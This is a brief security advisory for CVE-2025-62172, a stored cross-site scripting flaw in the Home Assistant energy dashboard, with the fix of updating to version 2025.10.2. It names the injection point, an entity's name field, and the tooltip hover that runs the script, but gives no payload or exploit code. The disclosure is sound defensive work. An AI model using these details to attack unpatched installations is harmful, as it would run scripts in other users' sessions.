CVE-2025-62172

Name of the Vulnerable Software and Affected Versions Home Assistant versions 2025.1.0 through 2025.10.1

Description Home Assistant is home automation software that prioritizes local control and privacy. The energy dashboard is susceptible to stored cross-site scripting. An authenticated user can inject malicious JavaScript code into an energy entity's name field. This code is then executed when any user hovers over data points in the energy dashboard graph tooltips. The issue occurs because entity names containing HTML are not properly sanitized before rendering in graph tooltips. This could allow an attacker with authentication to execute arbitrary JavaScript in the context of other users' sessions. If an energy provider supplies a malicious default name for an entity, the issue can be exploited without direct user action when the default name is used.

Recommendations Update to Home Assistant version 2025.10.2.